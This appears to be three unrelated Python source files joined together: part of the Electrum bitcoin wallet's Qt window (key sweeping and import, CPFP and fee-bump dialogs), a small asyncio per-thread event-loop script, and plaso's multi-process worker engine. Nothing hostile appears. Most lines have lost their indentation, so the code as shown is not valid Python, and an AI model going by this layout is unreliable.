raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
            self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def _rbf_dialog(self, tx: Transaction, func, title, help_text):
txid = tx.txid()
assert txid
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
fee = tx.get_fee()
assert fee is not None
tx_label = self.wallet.get_label_for_txid(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, title)
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(help_text))
ok_button = OkButton(d)
warning_label = WWLabel('\n')
warning_label.setStyleSheet(ColorScheme.RED.as_stylesheet())
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
def on_feerate():
fee_rate = feerate_e.get_amount()
warning_text = '\n'
if fee_rate is not None:
try:
new_tx = func(fee_rate)
except Exception as e:
new_tx = None
warning_text = str(e).replace('\n',' ')
else:
new_tx = None
ok_button.setEnabled(new_tx is not None)
warning_label.setText(warning_text)
feerate_e.textChanged.connect(on_feerate)
def on_slider(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
feerate_e.textEdited.connect(fee_slider.deactivate)
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
grid.addWidget(feerate_e, 2, 1)
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addWidget(warning_label)
vbox.addLayout(Buttons(CancelButton(d), ok_button))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = func(new_fee_rate)
except Exception as e:
self.show_error(str(e))
return
new_tx.set_rbf(not is_final)
self.show_transaction(new_tx, tx_desc=tx_label)
def bump_fee_dialog(self, tx: Transaction):
title = _('Bump Fee')
help_text = _("Increase your transaction's fee to improve its position in mempool.")
def func(new_fee_rate):
return self.wallet.bump_fee(
tx=tx,
txid=tx.txid(),
new_fee_rate=new_fee_rate,
coins=self.get_coins())
self._rbf_dialog(tx, func, title, help_text)
def dscancel_dialog(self, tx: Transaction):
title = _('Cancel transaction')
help_text = _(
"Cancel an unconfirmed RBF transaction by double-spending "
"its inputs back to your wallet with a higher fee.")
def func(new_fee_rate):
return self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate)
self._rbf_dialog(tx, func, title, help_text)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
p8.py
|
import asyncio
import threading
from threading import Thread
# Event loops live in the context of an event loop policy;
# the DefaultEventLoopPolicy keeps one loop per thread and will not create a loop
# via asyncio.get_event_loop() outside the main thread.
asyncio.get_event_loop()
def create_event_loop_thread(worker, *args, **kwargs):
def _worker(*args, **kwargs):
# thread-local event loop
loop = asyncio.new_event_loop()
print(id(loop))
asyncio.set_event_loop(loop)
try:
loop.run_until_complete(worker(*args, **kwargs))
finally:
loop.close()
return Thread(target=_worker, args=args, kwargs=kwargs)
async def print_coro(*args, **kwargs):
print(f"inside the print coro on {threading.get_ident()}", flush=True)
if __name__ == '__main__':
workers = [create_event_loop_thread(print_coro) for i in range(10)]
for thread in workers:
thread.start()
for thread in workers:
thread.join()
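# Hedged alternative sketch (not part of the original script): instead of one
# event loop per thread, a single background loop can serve coroutines submitted
# from any thread via asyncio.run_coroutine_threadsafe(). The helper below is
# illustrative only and is not invoked.
def run_on_shared_loop(n=10):
    loop = asyncio.new_event_loop()
    Thread(target=loop.run_forever, daemon=True).start()
    # Each submission returns a concurrent.futures.Future tied to the shared loop.
    futures = [asyncio.run_coroutine_threadsafe(print_coro(), loop) for _ in range(n)]
    for future in futures:
        future.result()  # block until the coroutine has finished on the shared loop
    loop.call_soon_threadsafe(loop.stop)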
|
engine.py
|
# -*- coding: utf-8 -*-
"""The multi-process processing engine."""
import abc
import ctypes
import os
import signal
import sys
import threading
import time
from plaso.engine import engine
from plaso.engine import process_info
from plaso.lib import definitions
from plaso.multi_process import logger
from plaso.multi_process import plaso_xmlrpc
class MultiProcessEngine(engine.BaseEngine):
"""Multi-process engine base.
This class contains functionality to:
* monitor and manage worker processes;
* retrieve process status information via RPC;
* manage the status update thread.
"""
# Note that on average Windows seems to require a longer wait.
_RPC_SERVER_TIMEOUT = 8.0
_MAXIMUM_RPC_ERRORS = 10
# Maximum number of attempts to try to start a replacement worker process.
_MAXIMUM_REPLACEMENT_RETRIES = 3
# Number of seconds to wait between attempts to start a replacement worker
# process
_REPLACEMENT_WORKER_RETRY_DELAY = 1
_PROCESS_JOIN_TIMEOUT = 5.0
_ZEROMQ_NO_WORKER_REQUEST_TIME_SECONDS = 300
def __init__(self):
"""Initializes a multi-process engine."""
super(MultiProcessEngine, self).__init__()
self._debug_output = False
self._name = 'Main'
self._log_filename = None
self._pid = os.getpid()
self._process_information = process_info.ProcessInfo(self._pid)
self._process_information_per_pid = {}
self._processes_per_pid = {}
self._quiet_mode = False
self._rpc_clients_per_pid = {}
self._rpc_errors_per_pid = {}
self._status_update_active = False
self._status_update_callback = None
self._status_update_thread = None
self._storage_writer = None
self._worker_memory_limit = definitions.DEFAULT_WORKER_MEMORY_LIMIT
def _AbortJoin(self, timeout=None):
"""Aborts all registered processes by joining with the parent process.
Args:
timeout (int): number of seconds to wait for processes to join, where
None represents no timeout.
"""
for pid, process in self._processes_per_pid.items():
logger.debug('Waiting for process: {0:s} (PID: {1:d}).'.format(
process.name, pid))
process.join(timeout=timeout)
if not process.is_alive():
logger.debug('Process {0:s} (PID: {1:d}) stopped.'.format(
process.name, pid))
def _AbortKill(self):
"""Aborts all registered processes by sending a SIGKILL or equivalent."""
for pid, process in self._processes_per_pid.items():
if not process.is_alive():
continue
logger.warning('Killing process: {0:s} (PID: {1:d}).'.format(
process.name, pid))
self._KillProcess(pid)
def _AbortTerminate(self):
"""Aborts all registered processes by sending a SIGTERM or equivalent."""
for pid, process in self._processes_per_pid.items():
if not process.is_alive():
continue
logger.warning('Terminating process: {0:s} (PID: {1:d}).'.format(
process.name, pid))
process.terminate()
def _CheckStatusWorkerProcess(self, pid):
"""Checks the status of a worker process.
If a worker process is not responding, the process is terminated and
a replacement process is started.
Args:
pid (int): process ID (PID) of a registered worker process.
Raises:
KeyError: if the process is not registered with the engine.
"""
# TODO: Refactor this method, simplify and separate concerns (monitoring
# vs management).
self._RaiseIfNotRegistered(pid)
process = self._processes_per_pid[pid]
process_status = self._QueryProcessStatus(process)
if process_status is None:
process_is_alive = False
else:
process_is_alive = True
process_information = self._process_information_per_pid[pid]
used_memory = process_information.GetUsedMemory() or 0
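# Both values are in bytes; a worker that exceeds the limit is killed outright.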
if self._worker_memory_limit and used_memory > self._worker_memory_limit:
logger.warning((
'Process: {0:s} (PID: {1:d}) killed because it exceeded the '
'memory limit: {2:d}.').format(
process.name, pid, self._worker_memory_limit))
self._KillProcess(pid)
if isinstance(process_status, dict):
self._rpc_errors_per_pid[pid] = 0
status_indicator = process_status.get('processing_status', None)
else:
rpc_errors = self._rpc_errors_per_pid.get(pid, 0) + 1
self._rpc_errors_per_pid[pid] = rpc_errors
if rpc_errors > self._MAXIMUM_RPC_ERRORS:
process_is_alive = False
if process_is_alive:
rpc_port = process.rpc_port.value
logger.warning((
'Unable to retrieve process: {0:s} (PID: {1:d}) status via '
'RPC socket: http://localhost:{2:d}').format(
process.name, pid, rpc_port))
processing_status_string = 'RPC error'
status_indicator = definitions.STATUS_INDICATOR_RUNNING
else:
processing_status_string = 'killed'
status_indicator = definitions.STATUS_INDICATOR_KILLED
process_status = {
'processing_status': processing_status_string}
self._UpdateProcessingStatus(pid, process_status, used_memory)
# _UpdateProcessingStatus can also change the status of the worker,
# so refresh the status if applicable.
for worker_status in self._processing_status.workers_status:
if worker_status.pid == pid:
status_indicator = worker_status.status
break
if status_indicator in definitions.ERROR_STATUS_INDICATORS:
logger.error((
'Process {0:s} (PID: {1:d}) is not functioning correctly. '
'Status code: {2!s}.').format(process.name, pid, status_indicator))
self._TerminateProcessByPid(pid)
replacement_process = None
for replacement_process_attempt in range(
self._MAXIMUM_REPLACEMENT_RETRIES):
logger.info((
'Attempt: {0:d} to start replacement worker process for '
'{1:s}').format(replacement_process_attempt + 1, process.name))
replacement_process = self._StartWorkerProcess(process.name)
if replacement_process:
break
time.sleep(self._REPLACEMENT_WORKER_RETRY_DELAY)
if not replacement_process:
logger.error(
'Unable to create replacement worker process for: {0:s}'.format(
process.name))
def _KillProcess(self, pid):
"""Issues a SIGKILL or equivalent to the process.
Args:
pid (int): process identifier (PID).
"""
if sys.platform.startswith('win'):
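# 1 == PROCESS_TERMINATE, the access right OpenProcess needs to end the process.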
process_terminate = 1
handle = ctypes.windll.kernel32.OpenProcess(
process_terminate, False, pid)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
ctypes.windll.kernel32.CloseHandle(handle)
else:
try:
os.kill(pid, signal.SIGKILL)
except OSError as exception:
logger.error('Unable to kill process {0:d} with error: {1!s}'.format(
pid, exception))
def _QueryProcessStatus(self, process):
"""Queries a process to determine its status.
Args:
process (MultiProcessBaseProcess): process to query for its status.
Returns:
dict[str, str]: status values received from the worker process.
"""
process_is_alive = process.is_alive()
if process_is_alive:
rpc_client = self._rpc_clients_per_pid.get(process.pid, None)
process_status = rpc_client.CallFunction()
else:
process_status = None
return process_status
def _RaiseIfNotMonitored(self, pid):
"""Raises if the process is not monitored by the engine.
Args:
pid (int): process identifier (PID).
Raises:
KeyError: if the process is not monitored by the engine.
"""
if pid not in self._process_information_per_pid:
raise KeyError(
'Process (PID: {0:d}) not monitored by engine.'.format(pid))
def _RaiseIfNotRegistered(self, pid):
"""Raises if the process is not registered with the engine.
Args:
pid (int): process identifier (PID).
Raises:
KeyError: if the process is not registered with the engine.
"""
if pid not in self._processes_per_pid:
raise KeyError(
'Process (PID: {0:d}) not registered with engine'.format(pid))
def _RegisterProcess(self, process):
"""Registers a process with the engine.
Args:
process (MultiProcessBaseProcess): process.
Raises:
KeyError: if the process is already registered with the engine.
ValueError: if the process is missing.
"""
if process is None:
raise ValueError('Missing process.')
if process.pid in self._processes_per_pid:
raise KeyError(
'Already managing process: {0!s} (PID: {1:d})'.format(
process.name, process.pid))
self._processes_per_pid[process.pid] = process
# pylint: disable=redundant-returns-doc
@abc.abstractmethod
def _StartWorkerProcess(self, process_name):
"""Creates, starts, monitors and registers a worker process.
Args:
process_name (str): process name.
Returns:
MultiProcessWorkerProcess: extraction worker process.
"""
def _StartMonitoringProcess(self, process):
"""Starts monitoring a process.
Args:
process (MultiProcessBaseProcess): process.
Raises:
IOError: if the RPC client cannot connect to the server.
KeyError: if the process is not registered with the engine or
if the process is already being monitored.
OSError: if the RPC client cannot connect to the server.
ValueError: if the process is missing.
"""
if process is None:
raise ValueError('Missing process.')
pid = process.pid
if pid in self._process_information_per_pid:
raise KeyError(
'Already monitoring process (PID: {0:d}).'.format(pid))
if pid in self._rpc_clients_per_pid:
raise KeyError(
'RPC client (PID: {0:d}) already exists'.format(pid))
rpc_client = plaso_xmlrpc.XMLProcessStatusRPCClient()
# Make sure that a worker process has started its RPC server.
# The RPC port will be 0 if no server is available.
rpc_port = process.rpc_port.value
time_waited_for_process = 0.0
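# Poll in 100 ms steps until the worker publishes its RPC port or the timeout elapses.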
while not rpc_port:
time.sleep(0.1)
rpc_port = process.rpc_port.value
time_waited_for_process += 0.1
if time_waited_for_process >= self._RPC_SERVER_TIMEOUT:
raise IOError(
'RPC client unable to determine server (PID: {0:d}) port.'.format(
pid))
hostname = 'localhost'
if not rpc_client.Open(hostname, rpc_port):
raise IOError((
'RPC client unable to connect to server (PID: {0:d}) '
'http://{1:s}:{2:d}').format(pid, hostname, rpc_port))
self._rpc_clients_per_pid[pid] = rpc_client
self._process_information_per_pid[pid] = process_info.ProcessInfo(pid)
def _StartStatusUpdateThread(self):
"""Starts the status update thread."""
self._status_update_active = True
self._status_update_thread = threading.Thread(
name='Status update', target=self._StatusUpdateThreadMain)
self._status_update_thread.start()
@abc.abstractmethod
def _StatusUpdateThreadMain(self):
"""Main function of the status update thread."""
def _StopMonitoringProcess(self, process):
"""Stops monitoring a process.
Args:
process (MultiProcessBaseProcess): process.
Raises:
KeyError: if the process is not monitored.
ValueError: if the process is missing.
"""
if process is None:
raise ValueError('Missing process.')
pid = process.pid
self._RaiseIfNotMonitored(pid)
del self._process_information_per_pid[pid]
rpc_client = self._rpc_clients_per_pid.get(pid, None)
if rpc_client:
rpc_client.Close()
del self._rpc_clients_per_pid[pid]
if pid in self._rpc_errors_per_pid:
del self._rpc_errors_per_pid[pid]
logger.debug('Stopped monitoring process: {0:s} (PID: {1:d})'.format(
process.name, pid))
def _StopMonitoringProcesses(self):
"""Stops monitoring all processes."""
# We need to make a copy of the list of pids since we are changing
# the dict in the loop.
for pid in list(self._process_information_per_pid.keys()):
self._RaiseIfNotRegistered(pid)
process = self._processes_per_pid[pid]
self._StopMonitoringProcess(process)
def _StopStatusUpdateThread(self):
"""Stops the status update thread."""
if self._status_update_thread:
self._status_update_active = False
if self._status_update_thread.is_alive():
self._status_update_thread.join()
self._status_update_thread = None
def _TerminateProcessByPid(self, pid):
"""Terminate a process that's monitored by the engine.
Args:
pid (int): process identifier (PID).
Raises:
KeyError: if the process is not registered with and monitored by the
engine.
"""
self._RaiseIfNotRegistered(pid)
process = self._processes_per_pid[pid]
self._TerminateProcess(process)
self._StopMonitoringProcess(process)
def _TerminateProcess(self, process):
"""Terminate a process.
Args:
process (MultiProcessBaseProcess): process to terminate.
"""
pid = process.pid
logger.warning('Terminating process: (PID: {0:d}).'.format(pid))
process.terminate()
# Wait for the process to exit.
process.join(timeout=self._PROCESS_JOIN_TIMEOUT)
if process.is_alive():
logger.warning('Killing process: (PID: {0:d}).'.format(pid))
self._KillProcess(pid)
@abc.abstractmethod
def _UpdateProcessingStatus(self, pid, process_status, used_memory):
"""Updates the processing status.
Args:
pid (int): process identifier (PID) of the worker process.
process_status (dict[str, object]): status values received from
the worker process.
used_memory (int): size of used memory in bytes.
Raises:
KeyError: if the process is not registered with the engine.
"""
|